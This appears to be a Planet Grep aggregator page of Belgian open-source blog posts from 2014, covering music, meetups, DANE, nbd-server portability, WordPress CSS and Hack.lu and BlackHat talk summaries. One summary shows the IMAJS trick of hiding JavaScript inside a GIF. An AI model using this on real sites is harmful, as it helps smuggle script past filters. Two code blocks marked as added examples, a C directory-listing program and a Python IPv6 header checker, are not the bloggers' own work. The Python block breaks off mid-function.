Planet Grep is open to all people who either have the Belgian nationality or live in Belgium, and who actively work with or contribute to Open Source/Free software.


October 30, 2014

Frank Goossens

Sad Musicians Make Better Music

While waiting for a meeting to begin, I perused the Spotify playlist of a colleague. One of the only names I recognized was Sia.

Aaaah Sia, … How I used to love her. Beautiful songs (both solo and with Zero 7), wrought with pain, doubt, passion and a splash of quirkiness. Think “Soon we’ll be found” or “Destiny” and above all “Breathe me” (which also featured in the most impressive finale of one of the most beautiful and slightly quirky TV shows ever), here in a live version in the KCRW studios in 2007;


But I’m afraid the love affair is over, Sia confessed to being happy now and the song on the Spotify playlist was David Guetta’s rather horrible Titanium which Sia provided vocals for. And recent Sia-tracks like “Chandelier”, “You’re Never Fully Dressed Without a Smile”, “You’ve changed” or these “7 Songs You Didn’t Know Were Written by Sia” don’t really move me either. I wish Sia all the happiness in the world, but I wish she was still sad. If only a tad.

by frank at October 30, 2014 04:41 PM

Les Jeudis du Libre

Mons, 20 November: An overview of Android application development


This Thursday, 20 November 2014 at 19:00, the 33rd Mons session of the Jeudis du Libre de Belgique will take place.

The subject of this session: An overview of Android application development

Topic: Internet|Programming|Mobile

Audience: Web developers|programmers|students|…

Speaker: François Stephany (Ta Mère SCRL)

Venue for this session: HEPH Condorcet, Chemin du Champ de Mars, 15 – 7000 Mons – Auditorium 2, located on the ground floor (see this map on the Openstreetmap site; NOTE: the entrance is not very visible from the main road, it is in the corner formed by a very large car park).

Participation is free and only requires registering under your name, preferably in advance, or at the entrance to the session. Please indicate your intention by registering via the page http://jeudisdulibre.fikket.com/. The session will be followed by a friendly drink.

The Jeudis du Libre in Mons are also supported by our partners: Normation, OpenSides, MeaWeb, NextLab, Phonoid and Creative Monkeys.

If you are interested in this monthly series, feel free to consult the agenda and subscribe to the mailing list so as to receive the announcements systematically.

As a reminder, the Jeudis du Libre are intended as spaces for exchange around Free Software themes. The Mons meetings take place every third Thursday of the month and are organised on the premises of, and in collaboration with, the Hautes Écoles and university faculties of the Pôle Hainuyer higher-education cluster involved in training computer scientists (UMONS, HEH and Condorcet), and with the support of the non-profit LoLiGrUB, which is active in promoting free software.

Description: There is no need to introduce Android; it is (almost) everywhere. But what lies behind this operating system? What are the components of an Android application? What limits are imposed on developers?

François offers a short overview of the platform. The presentation will be fairly technical, so it is advisable to have a minimum of experience with computer systems and/or programming in order to follow.

by Didier Villers at October 30, 2014 05:54 AM

October 29, 2014

Dries Buytaert

W3C declares HTML5 standard final

After 10 years of development, the W3C promoted HTML5 to "Recommendation" yesterday: http://www.w3.org/blog/news/archives/4167. W3C's "Recommendation" status is the highest level of maturation, effectively making the markup language a formal standard.

Almost 20% of the world's websites have adopted HTML5, so for many, HTML5 is nothing new.

Drafting the HTML5 standard appears to have been a difficult and tiring process. It took more than 50,000 email exchanges, and the group's bug lists record more than 4,000 errors and ambiguities that had to be resolved.

With HTML5 complete, you might wonder what is next for HTML? Take a look at HTML.next, the list of HTML.next proposed elements and attributes or the list of postponed feature requests.

The trend in development seems to be towards native mobile applications rather than mobile websites, but the future of HTML and its modular design has some interesting things in store. In the long run, I think the line between native applications and web applications will blur. I think the future is better integration and more seamless transitions between the two. Standards are important and can't be here fast enough!

by Dries at October 29, 2014 11:14 AM

October 28, 2014

Kurt Roeckx

DANE

I've been wanting to set up DANE for my domain, but I seem to be unable to find a provider that offers DNSSEC that can also do TLSA records in DNS. I've contacted several companies and most don't even seem to be offering DNSSEC. And if they offer DNSSEC they can't do TLSA records or rfc3597 style "unknown DNS resource record types". I would like to avoid actually running my own nameservers.

So if someone knows someone that can provide that, please contact me at kurt@roeckx.be.

Update [29 October 2014]:
Some people suggested that I set up a hidden master. I actually wanted to avoid that, but I guess I'm going to do that.

October 28, 2014 06:42 PM

October 25, 2014

Mark Van den Borre

Geert Noels over bankenlobby

Shortly after the crisis you sat on the Lamfalussy committee that was to design a blueprint for reforming the financial sector in Belgium. The end result was remarkably friendly. Did you experience those forces yourself?
Noels: ‘Look, that committee did serious work for six months. But the proposals to tackle ‘too big to fail’ and systemic risks did not make it into the final version of our report. Nor did my proposal to develop a systemic scale for banks. The plan was: the more points a bank scores on that scale, the higher the risk to the health of the financial system. On that basis you could have informed or warned savers when the above-average interest on their savings account also concealed above-average risk. An example: before the crisis KBC would have risen on that scale year after year, and afterwards fallen year after year. And it would make it possible to tax banks in a fair way. My proposal was not followed, and today small banks pay proportionally more bank tax than large ones. No, I did not protest loudly against that. Our lawyer says I had better not come back to that, but draw your own conclusions about what happened.’

original article

by Mark Van den Borre (noreply@blogger.com) at October 25, 2014 11:38 AM

October 24, 2014

Wouter Verhelst

Not using adirent

About a month ago, I received an upstream bug report that the nbd-server wouldn't build on Solaris and its derivatives. This was because nbd-server uses the d_type field of struct dirent, which is widely implemented (in Linux and FreeBSD, at least), but not part of POSIX and therefore not implemented on Solaris (which tends to be more conservative about implementing new features).

The bug reporter pointed towards a blog post by a Solaris user who had written something he calls "adirent", meant to work around the issue by implementing something that would wrap readdir() so that it would inject a stat() call when needed. While that approach works, it seems a bit strange to add a function which wraps readdir to become portable. After all, readdir() does not always return the file type in d_type, not even on systems that do implement it. One example in which this is true is XFS; if one runs readdir() on a directory on an XFS filesystem, then everything will have DT_UNKNOWN as its filetype, indicating that you need to run stat() after all.

As such, I think a better approach is to use that fact so that things will just work on systems where d_type isn't available. The GNU autotools even have a test for it (AC_STRUCT_DIRENT_D_TYPE), which makes things easier. In the case of NBD, I've added that to configure.ac, and then added a touch of preprocessor magic to reuse the infrastructure for dealing with DT_UNKNOWN which is already there:

#ifdef HAVE_STRUCT_DIRENT_D_TYPE
#define NBD_D_TYPE de->d_type
#else
/* no d_type field: every entry reports as DT_UNKNOWN, so stat() is always used */
#define NBD_D_TYPE 0
#define DT_UNKNOWN 0
#define DT_REG 1
#endif

/* ... opendir(), readdir(), ... */

switch(NBD_D_TYPE) {
    case DT_UNKNOWN:
        /* ... call stat(), figure out if it is a file ... */
    case DT_REG:
        /* ... we know it is a file ... */
    default:
        /* ... we know it is not a file ... */
}

This seems cleaner to me than using a wrapper, and has the additional advantage that the DT_UNKNOWN code path could receive some more testing.
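The same approach carried through to a complete, runnable program, as an added example (not nbd-server's own code): the classifier takes the stat() fallback both where struct dirent has no d_type (HAVE_STRUCT_DIRENT_D_TYPE undefined; here it stands in for the autoconf result and is simply assumed for Linux/BSD) and where the filesystem returns DT_UNKNOWN, and demo() exercises the normal path and a forced DT_UNKNOWN entry in a constructed temporary directory.

```c
/* Added example, not code from nbd-server: a portable "is this entry a
 * regular file?" check. HAVE_STRUCT_DIRENT_D_TYPE stands in for the
 * AC_STRUCT_DIRENT_D_TYPE autoconf result and is assumed for Linux/BSD. */
#define _DEFAULT_SOURCE
#define _XOPEN_SOURCE 700
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#if defined(__linux__) || defined(__FreeBSD__) || defined(__APPLE__)
#define HAVE_STRUCT_DIRENT_D_TYPE 1
#endif

#ifdef HAVE_STRUCT_DIRENT_D_TYPE
#define ENTRY_D_TYPE(de) ((de)->d_type)
#else
/* No d_type field: report every entry as DT_UNKNOWN so the stat() path
 * below is always taken. The two constants only need to be distinct. */
#define ENTRY_D_TYPE(de) 0
#define DT_UNKNOWN 0
#define DT_REG 8
#endif

/* Returns 1 if the entry is a regular file, 0 if not, -1 if stat() fails. */
int entry_is_regular_file(const char *dir, const struct dirent *de)
{
    switch (ENTRY_D_TYPE(de)) {
    case DT_REG:
        return 1;                  /* the filesystem told us directly */
    case DT_UNKNOWN: {             /* e.g. XFS, or no d_type at all */
        char path[4096];
        struct stat st;
        int n = snprintf(path, sizeof path, "%s/%s", dir, de->d_name);
        if (n < 0 || n >= (int)sizeof path)
            return -1;             /* name too long: treat as an error */
        if (stat(path, &st) != 0)
            return -1;
        return S_ISREG(st.st_mode) ? 1 : 0;
    }
    default:
        return 0;                  /* known type that is not a regular file */
    }
}

/* Counts regular files directly inside dir; -1 if it cannot be opened. */
int count_regular_files(const char *dir)
{
    DIR *d = opendir(dir);
    struct dirent *de;
    int count = 0;
    if (d == NULL)
        return -1;
    while ((de = readdir(d)) != NULL) {
        if (strcmp(de->d_name, ".") == 0 || strcmp(de->d_name, "..") == 0)
            continue;
        if (entry_is_regular_file(dir, de) == 1)
            count++;
    }
    closedir(d);
    return count;
}

/* Self-contained demo on a constructed temp dir holding one file and one
 * subdirectory. Returns 1 when (a) count_regular_files() reports 1 and
 * (b) a dirent forced to DT_UNKNOWN, as XFS would hand it out, is sorted
 * by the stat() fallback: file -> 1, directory -> 0, missing name -> -1. */
int demo(void)
{
    char dir[] = "/tmp/dtype_demo_XXXXXX", file[64], sub[64];
    struct dirent de;
    FILE *fp;
    int counted, f, d, m;
    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(file, sizeof file, "%s/a.txt", dir);
    snprintf(sub, sizeof sub, "%s/subdir", dir);
    if ((fp = fopen(file, "w")) == NULL)
        return 0;
    fclose(fp);
    if (mkdir(sub, 0700) != 0)
        return 0;
    counted = count_regular_files(dir);
    memset(&de, 0, sizeof de);
#ifdef HAVE_STRUCT_DIRENT_D_TYPE
    de.d_type = DT_UNKNOWN;        /* force the fallback even on ext4 */
#endif
    strcpy(de.d_name, "a.txt");  f = entry_is_regular_file(dir, &de);
    strcpy(de.d_name, "subdir"); d = entry_is_regular_file(dir, &de);
    strcpy(de.d_name, "nope");   m = entry_is_regular_file(dir, &de);
    unlink(file); rmdir(sub); rmdir(dir);
    return counted == 1 && f == 1 && d == 0 && m == -1;
}
```

Calling demo() from a main() returns 1 on a system with a writable /tmp; count_regular_files() on a path that cannot be opened returns -1.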

October 24, 2014 01:33 PM

Frank Goossens

Music from Our Tube; Wilco’s Impossible Germany

Nothing new, no ground-breaking beats nor exhilarating live Jazz-performances today, but “just” what I feel is an epic rock-song (“Impossible Germany”) written by a great rock-band (Wilco);


Enjoy your weekend!

by frank at October 24, 2014 12:25 PM

October 23, 2014

Xavier Mertens

Hack.lu 2014 Wrap-Up Day #3

The Internet is broken

The third day is over! After the speaker dinner in a cool place and a very short night, I attended more talks today (no workshops). Let’s go for the daily quick wrap-up…

The first talk was “Internet scanning – conducting research on 0/0” presented by Mark Schloesser from Rapid7, who is also a developer of the Cuckoo sandbox. The topic focused on the IPv4 address space of course. IPv6 could be nice for another talk but has many challenges.

Mark's vision of the Internet

Mark’s topic was not only the scanning part but also wide data-gathering. Example: when port 80 is publicly available, the website behind it is crawled. People think that scanning the Internet takes time… months? In reality, there are quite performant tools today like masscan or zmap that are able to scan the complete Internet address space in less than one hour. Of course, this is theoretical because packets are processed by many routers which can affect the overall performance of the scan. Scanning the Internet is not a new topic and other projects have existed for a while, like Shodan, the Shadowserver foundation or ErrataSec. Of course, Mark said that scanning the Internet is only performed for research purposes (in his case of course). He reviewed some interesting findings:

Mark presented a Rapid7 project called “Sonar” which helps to scan the Internet for specific ports/protocols. Here are some results:

Some recent findings?

To conclude, Mark said that, in such a project, collaboration is key! It is important to make data available to the infosec community. To achieve this, a website exists: scans.io. It was a great talk to start the day!

The next talk was presented by Saumil Shah. Does he still need an introduction? Saumil is a very cool guy who always comes with new crazy ideas and who explains them with simple words and modesty. This time, he came with a talk called “Hacking with pictures“.

Saumil on stage

Saumil has been delivering exploits for some years. When you write exploits, the first goal is to work below the radar with techniques like:

In 2011, he came with a cool attack called “255 shades of grey” and today it was a new one called “IMAJS” which consists of an image with embedded JavaScript. The concept: the same file can be used twice:

<img src="image.gif">
<script src="image.gif"></script>

The evil trick is to use comments to hide the image data:

GIF89A/*xxxxxx*/=0;xxxxxx

The JPEG format is even more powerful thanks to the EXIF data! But the problem is that some characters must be avoided. Another demo was an exploit using a heap spray attack to pop up, guess what, a calc.exe! This technique was called “Stegosploit” by Saumil and is based on the vulnerability labelled MS14-035 by Microsoft. The next idea was to have an attack based on some kind of “time machine”. The image is downloaded by the victim at a certain time but the exploitation occurs later. This could have a huge impact in incident response! Conclusions of this talk:

It was really a good presentation, my favourite of today!

After a short break, Paul Rascagnères and Eric Leblond presented “D&D of malware with exotic C&C“. This was a good team: Paul is a respected malware researcher and Eric is a core developer of Suricata, the open source IDS.

Paul & Eric on stage

Paul described different cases that he faced while doing malware analysis: how does malware communicate with its C&C servers? Then, Eric explained how to configure Suricata properly to catch the communications (while keeping the performance acceptable).

Conclusion of this talk: even if we have nice tools like dynamic sandbox analysis systems, it’s still very useful to reverse the malware code to understand how they communicate and write powerful rules! Funny presentation made by two crazy guys!

Then, two presentations were scheduled but I did not follow them: Dominique Bongard spoke about WPS or “WiFi Protected Setup”. After a good description of the WPS working principles (You know the button you have on your router or the sticker on the bottom), Dominique explained the weaknesses of this system.

Warning Sign

The next one was not a technical talk but a review of the cyberwar between Russia and Ukraine. Glib Pakharenko explained what happened before and during the war between the two countries. The cyber attacks started before the revolution and they are not only hacking or DDoS. It can also be:

A good example was the one of Russia which hacked SmartTVs in Ukraine and forced them to show terrorist channels!

The next talk was a presentation of mitmproxy by Maximilian Hils. This proxy plays man-in-the-middle and intercepts HTTPS requests. This tool is free and basically allows you to inspect encrypted traffic between the browser and the server, but not only! It can also:

The tool is console-based and really deserves to be part of your regular toolbox!

mitmproxy demo

And we continued with another talk. This one was called “How I hacked my city” by Amihai Neiderman. This was a walkthrough talk. Amihai told us a story: it began when he discovered a strange SSID “FREE_TLV” broadcast on the street. Curious, like many of us, he tried to connect to it and found more and more information.

Amihai on stage

He explained step by step, like a novel, how he successfully compromised the devices behind the wireless network: starting from testing standard passwords, SQL injections, download of the firmware (after being able to identify the vendor product) and how he successfully exploited the firmware.

The next talk focused on exploiting VirtualBox via the 3D acceleration feature. This was called “Breaking out VirtualBox through 3D acceleration” by Francisco Falcon. When I read the abstract of this talk, my first reaction was: “But, how many people use this feature with VirtualBox? Who’s running games on VirtualBox?“. Anyway, Francisco found a great way to abuse this feature! Note that the VirtualBox developers already warn users in the documentation: “This code may contain bugs“.

Francisco on stage

Before explaining how to exploit the feature, he explained how it works. VirtualBox 3D acceleration is based on Chromium, a library that allows remote rendering of graphics (but nothing related to the browser). The flow of data is the following:

host hardware -> host OS 
                 -> VirtualBox hypervisor (chromium server) 
                    -> Guest OS (vboxguest.sys) 
                       -> OpenGL client

The second part of the talk was dedicated to the detailed explanation of how to exploit this architecture.

My last talk was the one of Garcia Sebastian who presented a nice way to detect botnets activities via the network traffic (“Botnets Behavioral Patterns in the Network“).

Sebastian on stage

The idea behind this talk was based on the following question: how do we detect malware? We can analyze binary files (the malware itself) or the generated traffic (to exfiltrate data, to communicate with the C&C). File analysis can be static or dynamic but remains complex. And it’s the same for the network traffic. What are the performed actions and how do they change? An interesting statistic is how we analyse the network traffic.

The next question is: Is it working?

What’s not working?

Sebastian’s idea was to focus on single connections (which are related to a specific action like a DNS resolution, access to Google, a spam sent). He needed aggregation and created a 4-tuple based on: the source IP, the destination IP, the destination port and the protocol. Then he explained how the model was created by analysing the behaviour of each 4-tuple and extracting 3 features of each flow:

Based on the sizes of the flow, Sebastian explained how to assign a specific character to it (36 possible states). Based on this model, he was able to build a botnet detection model based on Markov chains. A nice research and a nice talk!

I did not attend the last talk. The day finished with the celebration of the CTF winners. The regular conference is now over. Tomorrow, no more regular talks, just a few workshops are still scheduled. Good edition of hack.lu which remains a conference with a specific atmosphere. See you next year for the 11th edition!

Note: the slides are available here.

by Xavier at October 23, 2014 09:37 PM

October 22, 2014

Xavier Mertens

Hack.lu 2014 Wrap-Up Day #2

The second day is over! I’m just back from a great speaker dinner in Esch s/Alzette. It’s time to write a quick wrap-up. There were again some Cisco forensics workshops on the schedule, that’s why I was not able to attend all of today’s talks.

The second day opened with Marion Marshalek‘s keynote called “TS/NOFORM“. This title is derived from the document classification used by the United States. Marion started with a nice introduction based on Star Wars characters to finish with a fact: today, it’s not Star Wars anymore but Cyberwars! Cyber means a lot of threats, for example the control of media, intellectual property being stolen, nation states spying (and being hacked), the loss of corporate data. Then she explained in detail how some malware were tracked. Interesting fact: it’s quite easy to detect the location/nationality of the malware developers by analysing the vocabulary and texts used in the code.

The first regular talk was presented by Claudio Guarnieri. He is a well-known security researcher mainly known thanks to the Cuckoo project (he’s the leader of this project). His presentation was called “Embrace the Viper and live happy“. Claudio presented his new baby called “Viper“.

Claudio on stage

The idea of the tool came from the mess that we are all facing around our files (samples) and tools. What about exploits? They are written using multiple tools and languages and it became unmanageable to keep them properly stored. That’s why HD Moore created the Metasploit framework a few years ago. And what about malware analysis? According to Claudio, it is exactly the same: we have multiple tools, producing multiple outputs in many formats. They are hard to integrate! “It sucks”. Claudio started a project called VxCage to make filesystems cleaner but it was never finished. Today, Viper is born. It’s a framework to store and manage samples. It provides an analysis module to inspect your samples and provides an easy way to create new modules. The project is written in Python. Right now, it is just a shell but other user interfaces could be possible. There is also a REST API. The structure is based on:

Some examples of existing modules are: Radare2, searching for known shellcode patterns, analysis of PDF or Office documents, etc. The product is not perfect but works quite well. Claudio made lots of nice demos. It seems very easy to use with simple and powerful commands. Claudio said that some modules are incomplete and that it lacks scripting and automation. The product must still be improved but looks great. It is a community project and Claudio is looking for developers/contributors. Viper is available here.

The next talk focused on TR-069, a technical specification called CWMP (“CPE WAN Management Protocol“). It was presented by Shahar Tal. It defines a protocol used for remote management of end-user devices (the Internet box that all of us have at home) and is based on SOAP/HTTP. Communications are performed between the user’s devices and a central server called ACS (“Auto Configuration Server“).

Shahar on stage

Basically, with TR-069, you allow “somebody” to access your device. The question which immediately comes to mind is: who do you trust to run code on your device at any time without approval? Shahar’s idea was to focus on the ACS instead of the router (which has already been targeted too much!). What if an ACS is compromised? The attacker could:

The first step is to find an ACS! How to achieve this? By compromising a router and checking the traffic or activity, by sniffing your own traffic or by scanning the Internet. Once found, the ACS becomes a regular target and, guess what? Many of them are not properly managed/configured. Shahar reviewed different examples of ACS and how they were compromised. Two examples:

About bad configurations, if SSL is available, according to Shahar, only 15% of them are using SSL to manage their CPE! Interesting talk! If you compromise an ACS, you can potentially own thousands of home routers!

Then, Fyodor Yarochkin, a regular speaker at hack.lu, came to present “Detecting bleeding edge malware: a practical report“. Fyodor is good at presenting research about monitoring malicious activities, malware and botnets. For him, when you’re compromised, you need to properly detect the who, when and how. The identification of the threat is very important. Fyodor explained how he tracked on-going malicious malware campaigns via DNS and HTTP monitoring, correlated with public information. As an example, he detected an attacker changing its domain name every 3 minutes, impressive!

Fyodor on stage

I just had a quick look at the talk about USB fuzzing. It was presented by Jordan Bouyat. It was very close to the one that I attended at BlackHat last week! To summarise briefly, USB fuzzing is interesting because USB ports are available everywhere today! After a short introduction about USB and its features (bus, detection, etc), Jordan explained the approach his company used to set up a USB fuzzing lab. Based on Qemu, the solution has pros & cons:

I expected a lot from the next talk. I was curious about the tool called WiHawk aka the “router vulnerability scanner“. Where previously we saw a talk about TR-069 which focused on ACS servers to pwn home routers, this talk focused again on them. Anamika Singh quickly summarised what a router is and what its core features are: route processing (deciding where to send packets), packet forwarding and special services like filters (ACL) or NAT. She started with a simple example where a password was discovered via an analysis of a router firmware with binwalk. Classic! Then she explained what the purpose of WiHawk is and described its features. Based on IronWasp (it must be installed on top of it), the framework provides the following checks:

The target can be specified as a single IP address, a network or, more interesting, a Shodan query (GeoIP – city, country, etc). This is an interesting tool but it is based on IronWasp which needs .Net! According to the website, it runs under Linux with wine… To be tested!

Finally, my last talk was the one of Frederik Braun: “We’re struggling to keep up” (a brief history of browser security features). The talk was based on the past, present and future of browsers. Today, “the web is the platform” said Frederik! He showed two screenshots which perfectly summarise the history of browsers. The first one is the Yahoo! homepage in the year 2000. The second one is gmail.com with plenty of nice features (fully dynamic web content). Another fact: browsers are everywhere, even in your car! From the past, we always improved the browser to fix security issues: HTML is a stateless protocol, so we invented cookies. We used plain-text communications? We invented HTTPS. It was opt-in? We implemented HSTS. It’s just a whack-a-mole game! Then Frederik reviewed the present issues and the future… Frederik’s conclusion? The browser can help to secure the website!

The last talk was the same as the one presented last week at BlackHat: “Evasion of high-end IDPS devices at the IPv6 era” by Enno Rey, Antonios Atlasis, Rafael. Tomorrow, nice talks are scheduled! Stay tuned for more news…

by Xavier at October 22, 2014 10:32 PM

Frank Goossens

Tweaking WordPress’s Expound theme’s menu

I’m helping on a site for a not-for-profit for which we selected “Expound” as the base theme. I like Expound; it looks great, there’s no jQuery- or webfont-cruft to worry about and although the CSS comes with a separate reset.css-file, it does (Auto-)optimize perfectly.

But I wasn’t happy with the menu color-scheme and with the fact that the menu lacked an indication that a child page of a main entry was being shown instead of the page of that main entry itself (confused much?).

Anyway, this is what I ended up with;

For those wanting to do something similar, this is the relevant CSS in my child theme;

/* don't want no blue */
.navigation-main .current-menu-item > a {
        background: #557B47 !important;
}

/* triangle should not be blue either, need it to be a bit bigger */
.navigation-main ul > .current_page_item a:after, .navigation-main ul > .current-menu-item a:after, .navigation-main ul > .current-post-ancestor a:after, .navigation-main ul > .current-menu-parent a:after, .navigation-main ul > .current-post-parent a:after {
        border-top: 10px solid #557B47 !important;
        bottom: -14px;
        z-index: 1000;
}

@media screen and (min-width: 600px) {
  /* if page from submenu, add line under parent item to show you're in that submenu */
  .navigation-main ul > .menu-item {
        border-bottom: 6px solid #3A3A3A !important;
  }
  .navigation-main ul > .current_page_item, .navigation-main ul > .current-menu-item, .navigation-main ul > .current-post-ancestor, .navigation-main ul > .current-menu-parent, .navigation-main ul > .current-post-parent {
        border-bottom: 6px solid #557B47 !important;
  }

  /* but not in submenu */
  .navigation-main .sub-menu > .menu-item {
        border-bottom: 0px !important;
  }

  /* less padding at the bottom to compensate for that extra line */
  .navigation-main a {
        padding: 10px 10px 4px !important;
  }

  /* except when in submenu */
  .navigation-main .sub-menu a {
        padding: 10px !important;
  }
}

/* change color to default brown if child-item is active */
.navigation-main ul > .current_page_item, .navigation-main ul > .current-menu-item, .navigation-main ul > .current-post-ancestor, .navigation-main ul > .current-menu-ancestor, .navigation-main ul > .current-menu-parent, .navigation-main ul > .current-post-parent {
        background: #3A3A3A !important;
}

Have fun!

by frank at October 22, 2014 03:22 PM

October 21, 2014

Xavier Mertens

Hack.lu 2014 Wrap-Up Day #1

Hack.lu 2014

Hello Dear Readers, my agenda is quite hot at the moment: after attending BlackHat last week in Amsterdam, I’m now in Luxembourg until Friday to attend the 10th edition of Hack.lu. The conference organized in Luxembourg has already reached a decade! Congratulations to the organizers for the event that I’ve been attending since 2008! It has remained since the beginning in my favorite top three for the following reasons: nice atmosphere, good sizing (not too big, not too small), most visitors are regular ones and it allows me to meet them once (or twice) a year.

As usual, the first day started with a first bunch of workshops. They are very interesting because, compared to regular talks, you’re not passively listening to the speaker but you are doing practical stuff to learn a new tool or protocol. My first choice was to attend a workshop about the ELK stack prepared by Christophe Vandeplas. ELK means “Elasticsearch, Logstash & Kibana” and allows you to collect, parse and store data for further processing. Christophe explained the basics of each component and how to perform forensics investigations based on ELK. I was already using ELK at home to process my logs but, honestly, Christophe gave me some ideas to improve my setup; he has a really good knowledge of this platform. Besides the workshop, he also maintains a Github repository with interesting content to help you in your daily ELK operations. Besides the classic usage which is collecting logs from your infrastructure (firewalls, proxies, servers, …), ELK can also be used to perform pure forensics investigations. Christophe explained how he performs these tasks. The example was given with the analysis of a piece of malware. The complete path is:

  Sandbox -> Pcap file -> Analysis via Suricata with generated EVE events (JSON) -> Logstash

The next workshop was the one of my friend Didier Stevens & myself about Cisco forensics investigations. We gave this workshop for the first time during BruCON and we were invited to provide it in Luxembourg. If you did not attend those conferences, don’t forget that we propose an online lab which allows you to perform the exercises proposed during the workshop. Two sessions were organized today and the first one was fully booked.

After the workshop, I joined the main room to attend the last talks of the day. I attended the last minutes of “Bypassing sandboxes for fun… Profit will be realized by sandbox vendors” by Paul Jung. Today vendors are using sandboxes in more and more products and claim that they are the best way to analyse the behaviour of malicious applications. But this remains a “cat & mouse game“. Malware developers have techniques to detect when their code is executed in a sandbox but also how to evade this “secure” environment. I attended only the last 10 mins of the talk which looked very deep and technical.

The next talk was presented by a French guy: Serge Guelton. He presented a research about Python: “Python code obfuscation: improving existing techniques“. Serge explained the different techniques that can be used to obfuscate Python code. For each technique, he reviewed the pros & cons. There can be multiple reasons to do this; a good example is the Dropbox client which is written in Python.

Finally the day ended with a very long presentation by Xeno Kovah about “Extreme privilege escalation on Windows 8 / UEFI systems“. For sure, the word “extreme” was a good choice. Xeno explained that, once a machine has been compromised, we can go further and we expect:

The talk explained deeply how the BIOS of a machine can be accessed from the operating system and also compromised. The day ended with a nice walking dinner with all the attendees and many interesting conversations with peers. I apologize for the lack of coverage of this first day, tomorrow should be more complete! Stay tuned!

Oh, by the way, this year Hack.lu implemented the same kind of wall of sheep as BruCON:

Credits to @Kaweechelchen

by Xavier at October 21, 2014 10:31 PM

October 20, 2014

Joram Barrez

My Five Rules for Remote Working

A couple of weeks ago, there was a stir (again) about remote working and its success and/or failure: it was reported that Reddit, the website where many people lose countless hours, was forcing all their employees to move to SF. After a similar thing happened at Yahoo last year it made me think about why remote work is such […]

by Joram Barrez at October 20, 2014 08:33 AM

October 17, 2014

Philip Van Hoof

De Fabeltjeskrant

https://www.youtube.com/watch?v=lIWy8taP1rE

Because it states exactly how the animals are doing.

by admin at October 17, 2014 11:29 PM

Xavier Mertens

BlackHat Europe 2014 Wrap-Up Day #2

BlackHat Day 2

Yesterday evening, I had a nice dinner with awesome infosec folks. We faced a massive “Denial of Sushi” attack but we survived! So, I’m just back from Amsterdam and here is my small wrap-up for the second BlackHat day.

My first choice was to attend a talk about IPv6. Antonio Atlasis, Enno Rey and Rafael Schaefer presented “Evasion of high-end IDPS devices at the IPv6 era”. They are regular speakers at BlackHat and always present interesting research. Belgium is facing a massive trend in IPv6 usage since the major telco enabled this protocol for more and more of their residential users. Please don’t think “But I don’t use it in my environment!”. IPv6 is at your door!

IPv6 VS. IDPS

They started the research by building a lab to play with IPv6 and IDPS and, guess what, they found interesting stuff. They made an introduction about IPv6 extension headers. An IPv6 datagram looks like a train… A train is composed of wagons. IPv6 packets can have multiple extension headers. They are not widely used today but every IPv6 stack has to support them. Examples of extensions:

There is a recommended order. All should occur at most once. So, how should a device react if this is not the case? Interesting: RFC 7045 says it SHOULD NOT discard packets containing unrecognised extension headers. What are the common problems that IDS are facing?

  1. Too many things are variable: types, sizes, order and number of occurrences of each one. Also the fields are variable. We can define IPv6 as a function with many parameters: f(v,w,x,y,z).
  2. Fragmentation! Both fragmentable and unfragmentable parts may contain any IPv6 extension headers; this makes problem number one more complicated to handle.
  3. How are extension headers chained? (via the Next Header field)

Based on these problems, you can now imagine how difficult it is for an IDPS to properly inspect IPv6 packets! What can go wrong? Chiron, an IPv6 penetration testing framework, has been used to test IPv6 extension headers. They tested four IPS: 2 open source and 2 well-known commercial solutions. Each solution was tested against 12 different evasion techniques. All of them have been reported to the vendors/developers. Some were patched quickly, for others it took longer and, guess what, others still remain open. To demonstrate this, the speakers performed several live demos:

What could be done? If you are using an IDPS…

Technical mitigations: implementation of RFC 7112. Configure your devices to drop IPv6 extension headers not used in your network. Sanitize packets before they reach your devices. A very interesting, well-prepared talk with demos working out of the box!
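As an added example (not the speakers' code or Chiron), here is a Python walker for the Next Header chain that an IDPS has to follow on every IPv6 packet, flagging the conditions the talk lists: a header occurring more often than allowed, Hop-by-Hop not directly after the IPv6 header, headers out of the RFC 2460 recommended order, a non-initial fragment whose upper-layer protocol cannot be decided, and truncated headers. The packet builder and the sample chains are constructed for this example.

```python
import struct
from dataclasses import dataclass
from typing import List, Optional

# IPv6 extension header numbers (RFC 2460 / IANA protocol numbers)
HOPOPT, ROUTING, FRAGMENT, ESP, AH, DSTOPTS = 0, 43, 44, 50, 51, 60
EXT_NAMES = {HOPOPT: "Hop-by-Hop", ROUTING: "Routing", FRAGMENT: "Fragment",
             ESP: "ESP", AH: "AH", DSTOPTS: "Destination Options"}
# RFC 2460 section 4.1 recommended order; Destination Options may legitimately appear twice
RECOMMENDED_ORDER = [HOPOPT, DSTOPTS, ROUTING, FRAGMENT, AH, ESP, DSTOPTS]


@dataclass
class ChainReport:
    chain: List[int]            # extension header numbers in the order seen
    upper_layer: Optional[int]  # e.g. 6 (TCP), 17 (UDP); None if it cannot be determined
    anomalies: List[str]


def _check_counts_and_order(chain: List[int], anomalies: List[str]) -> None:
    """Flag headers that occur too often or violate the recommended order."""
    for hdr in sorted(set(chain)):
        limit = 2 if hdr == DSTOPTS else 1
        if chain.count(hdr) > limit:
            anomalies.append(f"{EXT_NAMES[hdr]} occurs {chain.count(hdr)} times (max {limit})")
    pos = 0  # greedy subsequence match of the chain against RECOMMENDED_ORDER
    for hdr in chain:
        while pos < len(RECOMMENDED_ORDER) and RECOMMENDED_ORDER[pos] != hdr:
            pos += 1
        if pos == len(RECOMMENDED_ORDER):
            anomalies.append("extension headers out of RFC 2460 recommended order")
            break
        pos += 1


def walk_extension_headers(packet: bytes) -> ChainReport:
    """Follow the Next Header chain of a raw IPv6 packet and report anomalies."""
    anomalies: List[str] = []
    if len(packet) < 40 or (packet[0] >> 4) != 6:
        return ChainReport([], None, ["not an IPv6 packet"])
    payload_len = struct.unpack("!H", packet[4:6])[0]
    end = min(len(packet), 40 + payload_len)
    nh, offset, chain = packet[6], 40, []
    while nh in EXT_NAMES:
        if nh == ESP:  # everything after the ESP header is encrypted: stop here
            chain.append(ESP)
            _check_counts_and_order(chain, anomalies)
            return ChainReport(chain, None, anomalies)
        if offset + 8 > end:
            anomalies.append(f"truncated {EXT_NAMES[nh]} header")
            return ChainReport(chain, None, anomalies)
        if nh == FRAGMENT:
            hlen = 8
        elif nh == AH:
            hlen = (packet[offset + 1] + 2) * 4  # AH length is in 32-bit words minus 2
        else:
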